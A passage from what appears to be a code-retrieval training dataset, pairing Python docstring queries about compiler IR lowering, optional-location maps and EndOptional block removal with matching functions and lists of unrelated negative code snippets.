"def _ensure_node_in_anf(self, parent, field, node):\n if node is None:\n return node\n if _is_trivial(node):\n return node\n if isinstance(node, list):\n # If something's field was actually a list, e.g., variadic arguments.\n return [self._ensure_node_in_anf(parent, field, n) for n in node]\n if isinstance(node, gast.keyword):\n node.value = self._ensure_node_in_anf(parent, field, node.value)\n return node\n if isinstance(node, (gast.Starred, gast.withitem, gast.slice)):\n # These nodes aren't really extractable in their own right, but their\n # subnodes might be. Propagate the parent and field name to the child\n # nodes, instead of querying the configuration for children of, e.g.,\n # gast.Starred.\n return self._ensure_fields_in_anf(node, parent, field)\n if self._should_transform(parent, field, node):\n return self._do_transform_node(node)\n else:\n return node",
"def rewrite(expr: ResolvedExpression) -> None:\n if (\n isinstance(expr, FieldAccess.Expr)\n and isinstance(expr.abstract_expr, Super)\n and expr.node_data == prop\n ):\n expr.node_data = root_static\n\n for subexpr in expr.flat_subexprs(\n lambda e: isinstance(e, ResolvedExpression)\n ):\n rewrite(subexpr)",
"def evaluate(field):\n pass",
"def lower_ir(schema_info, ir):\n sanity_check_ir_blocks_from_frontend(ir.ir_blocks, ir.query_metadata_table)\n\n ir_blocks = insert_explicit_type_bounds(\n ir.ir_blocks,\n ir.query_metadata_table,\n type_equivalence_hints=schema_info.type_equivalence_hints,\n )\n\n ir_blocks = remove_mark_location_after_optional_backtrack(ir_blocks, ir.query_metadata_table)\n ir_blocks = lower_context_field_existence(ir_blocks, ir.query_metadata_table)\n ir_blocks = replace_local_fields_with_context_fields(ir_blocks)\n ir_blocks = optimize_boolean_expression_comparisons(ir_blocks)\n ir_blocks = merge_consecutive_filter_clauses(ir_blocks)\n ir_blocks = renumber_locations_to_one(ir_blocks)\n\n cypher_query = convert_to_cypher_query(\n ir_blocks,\n ir.query_metadata_table,\n type_equivalence_hints=schema_info.type_equivalence_hints,\n )\n\n cypher_query = move_filters_in_optional_locations_to_global_operations(\n cypher_query, ir.query_metadata_table\n )\n\n return cypher_query",
"def expand_field(self, field):\n if field in self.dtype_c:\n return [field]\n\n subfields = self.get_field_type(field).fields\n if subfields:\n return [ff for ff in self.full_fields if ff.startswith(field)]\n return [field]",
"def get_horizontal_filter():\n user_field = FeatureFlipper.USER_FEATURE_FIELD\n return (user_field, ) if _is_m2m(user_field) else ()",
"def _check_prepopulated_fields_key(self, obj, field_name, label):\n\n try:\n field = obj.model._meta.get_field(field_name)\n except FieldDoesNotExist:\n return refer_to_missing_field(\n field=field_name, option=label, obj=obj, id=\"admin.E027\"\n )\n else:\n if isinstance(\n field, (models.DateTimeField, models.ForeignKey, models.ManyToManyField)\n ):\n return [\n checks.Error(\n \"The value of '%s' refers to '%s', which must not be a \"\n \"DateTimeField, a ForeignKey, a OneToOneField, or a \"\n \"ManyToManyField.\" % (label, field_name),\n obj=obj.__class__,\n id=\"admin.E028\",\n )\n ]\n else:\n return []",
"def filter_access_levels(query, field, access_levels, owner_field = None,\n owner_object = None):\n \n access_filter = reduce(\n lambda q,access_level: q|Q(**{field: access_level}), access_levels, Q())\n if owner_field and owner_object:\n access_filter = access_filter | Q(**{owner_field: owner_object})\n return query.filter(access_filter)",
"def update_fields(self, fields_filter):\n self.fields = [field for field in self._get_available_fields()\n if self.is_field_wanted(fields_filter, field)]\n # add parents for child fields - otherwise we won't see any output!\n for field in self._fields:\n parent = ARCH.tracepoint_is_child(field)\n if (parent and parent not in self._fields):\n self.fields.append(parent)",
"def test_get_nested_filter_operators_validated(self):\n self.app.config[\"VALIDATE_FILTERS\"] = True\n\n where = \"\".join(\n (\n '?where={\"$and\":[{\"$or\":[{\"fldA\":\"valA\"},',\n '{\"fldB\":\"valB\"}]},{\"fld2\":\"val2\"}]}',\n )\n )\n response, status = self.get(self.known_resource, where)\n self.assert400(status)\n\n where = \"\".join(\n (\n '?where={\"$and\":[{\"$or\":[{\"role\":',\n '[\"agent\",\"client\"]},{\"key1\":\"str\"}]}, {\"prog\":1}]}',\n )\n )\n response, status = self.get(self.known_resource, where)\n self.assert200(status)",
"def render_template_fields(\n self,\n context: Context,\n jinja_env: Optional[\"jinja2.Environment\"] = None,\n ) -> Optional[\"BaseOperator\"]:\n raise NotImplementedError()",
"def di_field_check(self, table, fields):\n di_fields = list()\n\n for field in fields:\n di_field = False\n for k, v in excluded_fields.items():\n if k in table:\n if field in v:\n di_field = True\n di_fields.append(f'null as {field}' if di_field else field)\n\n return di_fields",
"def core_is_within_field(cursor_trail, tree, ast_node_type, fieldname):\n\n # A Module isn't within anything\n if cursor_trail == []:\n return False\n\n parent = get_node_at_cursor(cursor_trail[:-1], tree)\n child = get_node_at_cursor(cursor_trail, tree)\n\n # We are within the ast_node_type if our parent is of the type\n # and the fieldname is the specified one\n # or our parent itself is within the ast_node_type with the right field\n\n return (\n (isinstance(parent, ast_node_type) and get_field_name_for_child(parent, child)[0] == fieldname) \n or core_is_within_field(cursor_trail[:-1], tree, ast_node_type, fieldname)\n )",
"def compile_selector_filter(self, selector):\n def get_entity(field_id):\n \"Get field from entity tested by filter\"\n def get_entity_f(e, c):\n return e.get(field_id, None)\n return get_entity_f\n #\n def get_context(name, field_id):\n \"Get field from named value in current display context\"\n def get_context_f(e, c):\n if name in c and c[name]:\n return c[name].get(field_id, None)\n return None\n return get_context_f\n #\n def get_literal(value):\n \"Get literal value specified directly in selector string\"\n def get_literal_f(e, c):\n return value\n return get_literal_f\n #\n def get_val_f(selval):\n if selval['type'] == \"entity\":\n return get_entity(selval['field_id'])\n elif selval['type'] == \"context\":\n return get_context(selval['name'], selval['field_id'])\n elif selval['type'] == \"literal\":\n return get_literal(selval['value'])\n else:\n msg = \"Unrecognized value type from selector (%s)\"%selval['type']\n raise ValueError(msg)\n assert False, \"Unrecognized value type from selector\"\n #\n def match_eq(v1f, v2f):\n def match_eq_f(e, c):\n return v1f(e, c) == v2f(e, c)\n return match_eq_f\n #\n def match_in(v1f, v2f):\n def match_in_f(e, c):\n v1 = v1f(e, c)\n if not v1: return True\n v2 = v2f(e, c)\n if isinstance(v2, list):\n return v1 in v2\n return v1 == v2\n return match_in_f\n #\n def match_subtype(v1f, v2f):\n def match_subtype_f(e, c):\n return self._fieldcomp.subtype(v1f(e, c), v2f(e, c))\n return match_subtype_f\n #\n if selector in {None, \"\", \"ALL\"}:\n return None\n sel = self.parse_selector(selector)\n if not sel:\n msg = \"Unrecognized selector syntax (%s)\"%selector\n raise ValueError(msg)\n v1f = get_val_f(sel['val1'])\n v2f = get_val_f(sel['val2'])\n if sel['comp'] == \"==\":\n return match_eq(v1f, v2f)\n if sel['comp'] == \"in\":\n return match_in(v1f, v2f)\n if sel['comp'] == \"subtype\":\n return match_subtype(v1f, v2f)\n # Drop through: raise error\n msg = \"Unrecognized entity selector (%s)\"%selector\n raise ValueError(msg)",
"def extract_requested_fields(\n info: graphql.execution.base.ResolveInfo,\n fields: List[Union[Field, FragmentSpread]],\n do_convert_to_snake_case: bool = True,\n) -> Dict:\n\n result = {}\n for field in fields:\n\n # Set the `key` as the field name.\n key = field.name.value\n\n # Convert the key from camel-case to snake-case (if required).\n if do_convert_to_snake_case:\n key = to_snake_case(name=key)\n\n # Initialize `val` to `None`. Fields without nested-fields under them\n # will have a dictionary value of `None`.\n val = None\n\n # If the field is of type `Field` then extract the nested fields under\n # the `selection_set` (if defined). These nested fields will be\n # extracted recursively and placed in a dictionary under the field\n # name in the `result` dictionary.\n if isinstance(field, Field):\n if (\n hasattr(field, \"selection_set\") and\n field.selection_set is not None\n ):\n # Extract field names out of the field selections.\n val = extract_requested_fields(\n info=info,\n fields=field.selection_set.selections,\n )\n result[key] = val\n # If the field is of type `FragmentSpread` then retrieve the fragment\n # from `info.fragments` and recursively extract the nested fields but\n # as we don't want the name of the fragment appearing in the result\n # dictionary (since it does not match anything in the ORM classes) the\n # result will simply be result of the extraction.\n elif isinstance(field, FragmentSpread):\n # Retrieve referened fragment.\n fragment = info.fragments[field.name.value]\n # Extract field names out of the fragment selections.\n val = extract_requested_fields(\n info=info,\n fields=fragment.selection_set.selections,\n )\n result = val\n\n return result",
"def field(f):\n yield f",
"def expand_prefix(self, fieldname, prefix):\n\n for fn, text in self.terms_from(fieldname, prefix):\n if fn != fieldname or not text.startswith(prefix):\n return\n yield text",
"def enterLogicalExpressionAnd(self, ctx: RulesParser.LogicalExpressionAndContext):\n\n self.context.operator = LogicalOperator.AND\n self.context.left = ExpressionNode()\n self.context.left.parent = self.context\n self.context = self.context.left"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Expression visitor function that rewrites ContextFieldExistence expressions.
|
def regular_visitor_fn(expression):
if not isinstance(expression, ContextFieldExistence):
return expression
location_type = query_metadata_table.get_location_info(expression.location).type
# Since this function is only used in blocks that aren't ConstructResult,
# the location check is performed using a regular ContextField expression.
return BinaryComposition(
u'!=',
ContextField(expression.location, location_type),
NullLiteral)
|
[
"def lower_context_field_existence(ir_blocks, query_metadata_table):\n def regular_visitor_fn(expression):\n \"\"\"Expression visitor function that rewrites ContextFieldExistence expressions.\"\"\"\n if not isinstance(expression, ContextFieldExistence):\n return expression\n\n location_type = query_metadata_table.get_location_info(expression.location).type\n\n # Since this function is only used in blocks that aren't ConstructResult,\n # the location check is performed using a regular ContextField expression.\n return BinaryComposition(\n u'!=',\n ContextField(expression.location, location_type),\n NullLiteral)\n\n def construct_result_visitor_fn(expression):\n \"\"\"Expression visitor function that rewrites ContextFieldExistence expressions.\"\"\"\n if not isinstance(expression, ContextFieldExistence):\n return expression\n\n location_type = query_metadata_table.get_location_info(expression.location).type\n\n # Since this function is only used in ConstructResult blocks,\n # the location check is performed using the special OutputContextVertex expression.\n return BinaryComposition(\n u'!=',\n OutputContextVertex(expression.location, location_type),\n NullLiteral)\n\n new_ir_blocks = []\n for block in ir_blocks:\n new_block = None\n if isinstance(block, ConstructResult):\n new_block = block.visit_and_update_expressions(construct_result_visitor_fn)\n else:\n new_block = block.visit_and_update_expressions(regular_visitor_fn)\n new_ir_blocks.append(new_block)\n\n return new_ir_blocks",
"def fieldExists(session, fieldName, fieldValue):\n\treturn session.query(exists().where(fieldName == fieldValue)).scalar()",
"def render_template_fields(\n self,\n context: Context,\n jinja_env: Optional[\"jinja2.Environment\"] = None,\n ) -> Optional[\"BaseOperator\"]:\n raise NotImplementedError()",
"def _ensure_node_in_anf(self, parent, field, node):\n if node is None:\n return node\n if _is_trivial(node):\n return node\n if isinstance(node, list):\n # If something's field was actually a list, e.g., variadic arguments.\n return [self._ensure_node_in_anf(parent, field, n) for n in node]\n if isinstance(node, gast.keyword):\n node.value = self._ensure_node_in_anf(parent, field, node.value)\n return node\n if isinstance(node, (gast.Starred, gast.withitem, gast.slice)):\n # These nodes aren't really extractable in their own right, but their\n # subnodes might be. Propagate the parent and field name to the child\n # nodes, instead of querying the configuration for children of, e.g.,\n # gast.Starred.\n return self._ensure_fields_in_anf(node, parent, field)\n if self._should_transform(parent, field, node):\n return self._do_transform_node(node)\n else:\n return node",
"def hx_visit_expr(self, func_visit):\n self._hx_visit_generic(_hx_visitor_expr, func_visit)",
"def rewrite(expr: ResolvedExpression) -> None:\n if (\n isinstance(expr, FieldAccess.Expr)\n and isinstance(expr.abstract_expr, Super)\n and expr.node_data == prop\n ):\n expr.node_data = root_static\n\n for subexpr in expr.flat_subexprs(\n lambda e: isinstance(e, ResolvedExpression)\n ):\n rewrite(subexpr)",
"def evaluate(field):\n pass",
"def __addIdentWithExp(self, tnode, index_name, exp):\n\n if isinstance(exp, orio.module.loop.ast.NumLitExp) and exp.val == 0:\n return tnode\n\n if isinstance(tnode, orio.module.loop.ast.ExpStmt):\n if tnode.exp:\n tnode.exp = self.__addIdentWithExp(tnode.exp, index_name, exp)\n return tnode\n\n if isinstance(tnode, orio.module.loop.ast.GotoStmt):\n return tnode\n\n elif isinstance(tnode, orio.module.loop.ast.CompStmt):\n tnode.stmts = [\n self.__addIdentWithExp(s, index_name, exp) for s in tnode.stmts\n ]\n return tnode\n\n elif isinstance(tnode, orio.module.loop.ast.IfStmt):\n tnode.test = self.__addIdentWithExp(tnode.test, index_name, exp)\n tnode.true_stmt = self.__addIdentWithExp(tnode.true_stmt, index_name, exp)\n if tnode.false_stmt:\n tnode.false_stmt = self.__addIdentWithExp(\n tnode.false_stmt, index_name, exp\n )\n return tnode\n\n elif isinstance(tnode, orio.module.loop.ast.ForStmt):\n if tnode.init:\n tnode.init = self.__addIdentWithExp(tnode.init, index_name, exp)\n if tnode.test:\n tnode.test = self.__addIdentWithExp(tnode.test, index_name, exp)\n if tnode.iter:\n tnode.iter = self.__addIdentWithExp(tnode.iter, index_name, exp)\n tnode.stmt = self.__addIdentWithExp(tnode.stmt, index_name, exp)\n return tnode\n\n elif isinstance(tnode, orio.module.loop.ast.TransformStmt):\n err(\n \"orio.module.loop.submodule.unrolljam.transformation internal error: unprocessed transform statement\"\n )\n\n elif isinstance(tnode, orio.module.loop.ast.NumLitExp):\n return tnode\n\n elif isinstance(tnode, orio.module.loop.ast.StringLitExp):\n return tnode\n\n elif isinstance(tnode, orio.module.loop.ast.IdentExp):\n if tnode.name != index_name:\n if self.ufactor == 1:\n return tnode\n else:\n if tnode.name in self.varsToAdd:\n k = orio.module.loop.ast.IdentExp(tnode.name + str(exp))\n return k\n else:\n return tnode\n else:\n add_exp = orio.module.loop.ast.BinOpExp(\n tnode, exp.replicate(), orio.module.loop.ast.BinOpExp.ADD\n )\n return orio.module.loop.ast.ParenthExp(add_exp)\n\n elif isinstance(tnode, orio.module.loop.ast.ArrayRefExp):\n if isinstance(tnode.exp, orio.module.loop.ast.ArrayRefExp):\n tnode.exp = self.__addIdentWithExp(tnode.exp, index_name, exp)\n tnode.sub_exp = self.__addIdentWithExp(tnode.sub_exp, index_name, exp)\n return tnode\n\n elif isinstance(tnode, orio.module.loop.ast.FunCallExp):\n tnode.exp = self.__addIdentWithExp(tnode.exp, index_name, exp)\n tnode.args = [\n self.__addIdentWithExp(a, index_name, exp) for a in tnode.args\n ]\n return tnode\n\n elif isinstance(tnode, orio.module.loop.ast.UnaryExp):\n tnode.exp = self.__addIdentWithExp(tnode.exp, index_name, exp)\n return tnode\n\n elif isinstance(tnode, orio.module.loop.ast.BinOpExp):\n tnode.lhs = self.__addIdentWithExp(tnode.lhs, index_name, exp)\n tnode.rhs = self.__addIdentWithExp(tnode.rhs, index_name, exp)\n return tnode\n\n elif isinstance(tnode, orio.module.loop.ast.ParenthExp):\n tnode.exp = self.__addIdentWithExp(tnode.exp, index_name, exp)\n return tnode\n\n elif isinstance(tnode, orio.module.loop.ast.NewAST):\n return tnode\n\n elif isinstance(tnode, orio.module.loop.ast.Comment):\n return tnode\n\n else:\n err(\n 'orio.module.loop.submodule.unrolljam.transformation.__addIdentWithExp internal error: unexpected AST type: \"%s\"'\n % tnode.__class__.__name__\n )",
"def visitExistsExpressionAtom(self, ctx: MySqlParser.ExistsExpressionAtomContext) -> SQLToken:\n select_statement = self.visit(ctx.selectStatement())\n return SQLToken(FUNC, ('exits', select_statement))",
"def _check_field(table, field, name, type_):\n columns = [getattr(table.columns, key) for key in table.columns.keys()]\n\n # If ‘field’ is not specified, we try to autodetect it from the columns\n # of the table based on ‘type_’.\n if field is None:\n candidates = filter(lambda c: isinstance(c.type, type_), columns)\n if len(candidates) == 1:\n field = candidates[0]\n else:\n field = 'tree_' + name\n\n # We assume that we'll be passed either a string or a SQLAlchemy Column\n # object (duck typing is not allowed). If what we're passed is a Column\n # object, we just need to check that\n if not isinstance(field, basestring):\n assert isinstance(field, sqlalchemy.Column)\n assert field.table is table\n\n # Otherwise we're passed a string, and either we find a field with that\n # name in the existing table Columns (likely but not necessarily if the\n # developer specified their own field name), or we'll have to create a\n # new column of the specified name and type, and insert it into the\n # table's column descriptions.\n elif field in table.columns:\n # Column exists:\n field = table.columns[field]\n else:\n # Column not found; create it:\n field = sqlalchemy.Column(field, type_(), nullable=False)\n table.append_column(field)\n # And return (since we know the following checks are redundant):\n return field\n\n # If we found the column or the developer specified it directly, we'll\n # do a quick sanity check to make sure that the column has the right\n # type and meta-attributes:\n assert isinstance(field.type, type_), \\\n \"The type of %s field should be %r\" % (name, type_)\n assert not field.nullable, \\\n \"The %s field should not be nullable\" % name\n\n # Field passes; return to caller:\n return field",
"def _check_raw_id_fields_item(self, obj, field_name, label):\n\n try:\n field = obj.model._meta.get_field(field_name)\n except FieldDoesNotExist:\n return refer_to_missing_field(\n field=field_name, option=label, obj=obj, id=\"admin.E002\"\n )\n else:\n # Using attname is not supported.\n if field.name != field_name:\n return refer_to_missing_field(\n field=field_name,\n option=label,\n obj=obj,\n id=\"admin.E002\",\n )\n if not field.many_to_many and not isinstance(field, models.ForeignKey):\n return must_be(\n \"a foreign key or a many-to-many field\",\n option=label,\n obj=obj,\n id=\"admin.E003\",\n )\n else:\n return []",
"def _process_frame(self, frame, with_vars):\n nodes = self._get_statements_for_frame(frame)\n raw_frame, filename, lineno, func_name, _, _ = frame\n\n varmap = None\n if with_vars:\n varmap = {}\n\n xfrmr = _checkTransformer(raw_frame.f_locals, raw_frame.f_globals)\n xfrmd = xfrmr.visit(ast.Module(copy.deepcopy(nodes)))\n\n for n in itertools.chain(ast.walk(xfrmd), xfrmr.extras):\n if isinstance(n, _resolved):\n val = n.value\n if isinstance(val, ast.AST):\n continue\n if n.representation in ('True', 'False', 'None'):\n continue\n if callable(val) or id(val) in self._ignore_set:\n continue\n if n.representation not in varmap:\n varmap[n.representation] = render_user_value(val)\n\n return CheckFrame(\n filename,\n lineno,\n func_name,\n '; '.join(astunparse.unparse(n).strip() for n in nodes),\n varmap\n )",
"def _fieldReferenceRenderer(self, node, context=None, **kwds):\n # get the reference to render itself\n return node.sql(context=context, **kwds)",
"def compile_selector_filter(self, selector):\n def get_entity(field_id):\n \"Get field from entity tested by filter\"\n def get_entity_f(e, c):\n return e.get(field_id, None)\n return get_entity_f\n #\n def get_context(name, field_id):\n \"Get field from named value in current display context\"\n def get_context_f(e, c):\n if name in c and c[name]:\n return c[name].get(field_id, None)\n return None\n return get_context_f\n #\n def get_literal(value):\n \"Get literal value specified directly in selector string\"\n def get_literal_f(e, c):\n return value\n return get_literal_f\n #\n def get_val_f(selval):\n if selval['type'] == \"entity\":\n return get_entity(selval['field_id'])\n elif selval['type'] == \"context\":\n return get_context(selval['name'], selval['field_id'])\n elif selval['type'] == \"literal\":\n return get_literal(selval['value'])\n else:\n msg = \"Unrecognized value type from selector (%s)\"%selval['type']\n raise ValueError(msg)\n assert False, \"Unrecognized value type from selector\"\n #\n def match_eq(v1f, v2f):\n def match_eq_f(e, c):\n return v1f(e, c) == v2f(e, c)\n return match_eq_f\n #\n def match_in(v1f, v2f):\n def match_in_f(e, c):\n v1 = v1f(e, c)\n if not v1: return True\n v2 = v2f(e, c)\n if isinstance(v2, list):\n return v1 in v2\n return v1 == v2\n return match_in_f\n #\n def match_subtype(v1f, v2f):\n def match_subtype_f(e, c):\n return self._fieldcomp.subtype(v1f(e, c), v2f(e, c))\n return match_subtype_f\n #\n if selector in {None, \"\", \"ALL\"}:\n return None\n sel = self.parse_selector(selector)\n if not sel:\n msg = \"Unrecognized selector syntax (%s)\"%selector\n raise ValueError(msg)\n v1f = get_val_f(sel['val1'])\n v2f = get_val_f(sel['val2'])\n if sel['comp'] == \"==\":\n return match_eq(v1f, v2f)\n if sel['comp'] == \"in\":\n return match_in(v1f, v2f)\n if sel['comp'] == \"subtype\":\n return match_subtype(v1f, v2f)\n # Drop through: raise error\n msg = \"Unrecognized entity selector (%s)\"%selector\n raise ValueError(msg)",
"def field(f):\n yield f",
"def field_is_unique(self, entity, field_name):\n value = getattr(entity, field_name)\n found = yield self.find_by_field_value(field_name, value)\n returnValue(len(found) > 0)",
"def process_field_xref(self, pnode: pending_xref) -> None:\n pass",
"def CreateTagTemplateField(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details(\"Method not implemented!\")\n raise NotImplementedError(\"Method not implemented!\")",
"def _wrap_create(self, old_create, model):\n def wrapper(cr, uid, vals, context=None):\n # avoid loops or cascading actions\n if context and context.get('action'):\n return old_create(cr, uid, vals, context=context)\n\n context = dict(context or {}, action=True)\n new_id = old_create(cr, uid, vals, context=context)\n\n # as it is a new record, we do not consider the actions that have a prefilter\n action_dom = [('model', '=', model), ('trg_date_id', '=', False), ('filter_pre_id', '=', False)]\n action_ids = self.search(cr, uid, action_dom, context=context)\n\n # check postconditions, and execute actions on the records that satisfy them\n for action in self.browse(cr, uid, action_ids, context=context):\n if self._filter(cr, uid, action, action.filter_id, [new_id], context=context):\n self._process(cr, uid, action, [new_id], context=context)\n return new_id\n\n return wrapper"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Construct a map from simple optional locations to their inner location and traversed edge.
|
def extract_simple_optional_location_info(
ir_blocks, complex_optional_roots, location_to_optional_roots):
# Simple optional roots are a subset of location_to_optional_roots.values() (all optional roots)
# We filter out the ones that are also present in complex_optional_roots.
location_to_preceding_optional_root_iteritems = six.iteritems({
location: optional_root_locations_stack[-1]
for location, optional_root_locations_stack in six.iteritems(location_to_optional_roots)
})
simple_optional_root_to_inner_location = {
optional_root_location: inner_location
for inner_location, optional_root_location in location_to_preceding_optional_root_iteritems
if optional_root_location not in complex_optional_roots
}
simple_optional_root_locations = set(simple_optional_root_to_inner_location.keys())
# Blocks within folded scopes should not be taken into account in this function.
_, non_folded_ir_blocks = extract_folds_from_ir_blocks(ir_blocks)
simple_optional_root_info = {}
preceding_location = None
for current_block in non_folded_ir_blocks:
if isinstance(current_block, MarkLocation):
preceding_location = current_block.location
elif isinstance(current_block, Traverse) and current_block.optional:
if preceding_location in simple_optional_root_locations:
# The current optional Traverse is "simple"
# i.e. it does not contain any Traverses within.
inner_location = simple_optional_root_to_inner_location[preceding_location]
inner_location_name, _ = inner_location.get_location_name()
simple_optional_info_dict = {
'inner_location_name': inner_location_name,
'edge_field': current_block.get_field_name(),
}
simple_optional_root_info[preceding_location] = simple_optional_info_dict
return simple_optional_root_info
|
[
"def _build_default_map(self):\n\n return [[\"-\" for x in range(self.map_size[0])] \n for y in range(self.map_size[1])]",
"def _iso_inv_map(d):\n _d = {}\n for src, d2 in d.items():\n for tgt, data in d2.items():\n if tgt is not None and src != tgt:\n if tgt not in _d:\n _d[tgt] = {}\n _d[tgt][src] = '--' + data\n for k, d2 in _d.items():\n d[k].update(d2)",
"def test_can_create_from_complex_dict(self):\n original_map = {}\n original_map['control'] = ['pid', 'odometry']\n original_map['foo'] = ['bar']\n\n locations = create_dependency_location_map(original_map)\n\n self.assertEqual(\"control\", locations[\"pid\"])\n self.assertEqual(\"control\", locations[\"odometry\"])\n self.assertEqual(\"foo\", locations[\"bar\"])",
"def map_roads():\n\n dict_map = defaultdict(default_factory,{\n \"disused\" : \"other\",\n \"dummy\" : \"other\",\n \"planned\" : \"other\",\n \"platform\" : \"other\",\n \"unsurfaced\" : \"track\",\n \"traffic_island\" : \"other\",\n \"razed\" : \"other\",\n \"abandoned\" : \"other\",\n \"services\" : \"track\",\n \"proposed\" : \"other\",\n \"corridor\" : \"track\",\n \"bus_guideway\" : \"other\",\n \"bus_stop\" : \"other\",\n \"rest_area\" : \"other\",\n \"yes\" : \"other\",\n \"trail\" : \"other\",\n \"escape\" : \"track\",\n \"raceway\" : \"other\",\n \"emergency_access_point\" : \"track\",\n \"emergency_bay\" : \"track\",\n \"construction\" : \"track\",\n \"bridleway\" : \"track\",\n \"cycleway\" : \"other\",\n \"footway\" : \"other\",\n \"living_street\" : \"tertiary\",\n \"path\" : \"track\",\n \"pedestrian\" : \"other\",\n \"primary\" : \"primary\",\n \"primary_link\" : \"primary\",\n \"residential\" : \"tertiary\",\n \"road\" : \"secondary\",\n \"secondary\" : \"secondary\",\n \"secondary_link\" : \"secondary\",\n \"service\" : \"tertiary\",\n \"steps\" : \"other\",\n \"tertiary\" : \"tertiary\",\n \"tertiary_link\" : \"tertiary\",\n \"track\" : \"track\",\n \"unclassified\" : \"tertiary\",\n \"trunk\" : \"primary\",\n \"motorway\" : \"primary\",\n \"trunk_link\" : \"primary\",\n \"motorway_link\" : \"primary\"\n })\n \n return dict_map",
"def _get_undirected_edges(self, mapping):\n edges = {}\n for et in utils.rels_types:\n edges[et] = {}\n for g in self.G.nodes:\n edges[et][mapping[g]] = []\n for s, t, meta in self.G.edges(data=True):\n edges[meta['type']][mapping[s]].append(mapping[t])\n edges[meta['type']][mapping[t]].append(mapping[s])\n return edges",
"def test_populate_map(self):\n map1 = \"\"\"\\\n OOOOOO\n OJDJJO\n OSJJOO\n OOOOOO\"\"\"\n m = Ma.Map(map1)\n pos = (1, 1)\n pop = [Fa.Carnivore(), Fa.Herbivore(), Fa.Carnivore()]\n m.populate_map(pos, pop)\n assert m.island[1, 1].total_pop == 3\n assert m.island[1, 1].carnivore_pop == 2",
"def map_railway():\n\n dict_map = defaultdict(default_factory,{\n \"rail\" : \"primary_rail\",\n \"station\" : \"station\",\n \"platform_edge\":\"platform\", \n \"platform\" : \"platform\",\n \"abandoned\" : \"disused\",\n \"razed\": \"disused\", \n \"construction\" : \"construction\",\n \"disused\" : \"disused\" ,\n \"funicular\" : \"other\" ,\n \"light_rail\" : \"light_rail\",\n \"miniature\" : \"other\",\n \"narrow_gauge\" : \"other\",\n \"preserverd\" : \"other\",\n \"subway\" : \"subway\",\n \"tram\" : \"tram\"\n \n })\n\n return dict_map",
"def get_shortest_path_map(g: Graph,\n start: Any, end: Any, points: list) -> dict[Any, dict[Any, Path]]:\n\n shortest_map = {start: {},\n end: {}}\n for point in points:\n shortest_map[point] = {}\n\n for point in points:\n for other in points:\n if other != point:\n shortest_path = _dijkstra(g, point, other)\n reverse = shortest_path.get_reversed()\n\n shortest_map[point][other] = shortest_path\n shortest_map[other][point] = reverse\n\n from_start = _dijkstra(g, start, point)\n shortest_map[start][point] = from_start\n\n to_end = _dijkstra(g, point, end)\n shortest_map[point][end] = to_end\n\n return shortest_map",
"def get_shortest_map_and_graph(g: Graph, start: Any, end: Any, points: list) ->\\\n tuple[dict[Any, dict[Any, Path]], Graph]:\n\n shortest_map = get_shortest_path_map(g, start, end, points)\n shortest_graph = convert_shortest_map_to_graph(shortest_map)\n\n return shortest_map, shortest_graph",
"def is_mapedge(mymap, x, y):\n if mymap[x][y].mapedge:\n return True\n else:\n return False",
"def _get_distances_map(self, distances):\n distances_map = {}\n for a, b, d in distances:\n distances_map[(a, b)] = d\n distances_map[(b, a)] = d\n distances_map[(a, a)] = 0.0\n distances_map[(b, b)] = 0.0\n return distances_map",
"def _derived_edges_mapping(self):\n mapping = {}\n purposes = ['METAL', 'DEVICE_METAL', 'CIRCUIT_METAL']\n for pl in RDD.get_physical_layers_by_purpose(purposes=purposes):\n key = pl.process.symbol\n if hasattr(RDD.PLAYER[key], 'EDGE_CONNECTED'):\n derived_layer = RDD.PLAYER[key].EDGE_CONNECTED\n ps_1 = derived_layer.layer1.process.symbol\n ps_2 = derived_layer.layer2.process.symbol\n if ps_1 == ps_2:\n mapping[derived_layer] = RDD.PLAYER[key].OUTSIDE_EDGE_DISABLED\n else:\n es = \"Error in RDD: Edge process \\'{}\\' not the same as metal process \\'{}\\'.\"\n raise ValueError(es.format(ps_2, ps_1))\n else:\n LOG.warning('Edge detection for METAL layer {} ignored.'.format(key))\n return mapping",
"def create_edge_dict(edgelist):\n edgedict = {}\n for (p, q, w) in edgelist:\n edgedict[(p, q)] = w\n return edgedict",
"def create_custom_mapping(custom_map: dict = None) -> Callable[[dict], dict]:\n if custom_map is None:\n custom_map = {}\n\n custom_tree = {}\n\n if isinstance(custom_map, dict):\n for key, value in custom_map.items():\n subtree = custom_tree\n for char in key:\n if not subtree.get(char):\n subtree[char] = {}\n subtree = subtree[char]\n subtree[\"\"] = value\n\n def make_map(map: dict):\n map_copy = map.copy()\n\n def transform_map(map_subtree, custom_subtree):\n if (not map_subtree) or isinstance(map_subtree, str):\n return custom_subtree\n new_subtree = map_subtree\n for char, subtree in custom_subtree.items():\n new_subtree[char] = transform_map(map_subtree.get(char), subtree)\n return new_subtree\n\n return transform_map(map_copy, custom_tree)\n\n return make_map",
"def _build_colormap(c_map, f_map):\n\n return {k: v for k, v in c_map + f_map if v is not None}",
"def EdgePropertySet(edge=None):\n if edge is None:\n return {PROV2NEO_EDGE}\n label = (PROV2NEO_LABEL, edge_label(edge))\n properties = [*edge.attributes[2:], *edge.extra_attributes]\n return {PROV2NEO_EDGE, label, *properties}",
"def buildMap(self, bingo):\n numToCoordsMap = {}\n dim = len(bingo)\n for x in range(dim):\n for y in range(dim):\n numToCoordsMap[bingo[x][y]] = (x,y)\n return numToCoordsMap",
"def create_neighborhood_dict(edgelist):\n ndict = {}\n for ed in edgelist:\n p, q, _ = ed\n if p not in ndict:\n ndict[p] = set()\n if q not in ndict:\n ndict[q] = set()\n ndict[p].add(q)\n ndict[q].add(p)\n return ndict",
"def zeros(geometry):\n\ttiles = [enmap.zeros(ts,tw,dtype=geometry.dtype) for ts,tw in geometry.loc_geometry]\n\treturn Dmap(geometry, tiles, copy=False)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Return a list of IR blocks as a copy of the original, with EndOptional blocks removed.
|
def remove_end_optionals(ir_blocks):
new_ir_blocks = []
for block in ir_blocks:
if not isinstance(block, EndOptional):
new_ir_blocks.append(block)
return new_ir_blocks
|
[
"def get_block_chain(self) -> List[Block]:\n return [Block(h, t) for h, t in self.chain.items()]",
"def copy(self):\n new_list = CircularPositionalList()\n for e in self:\n new_list.add_last(e)\n return new_list",
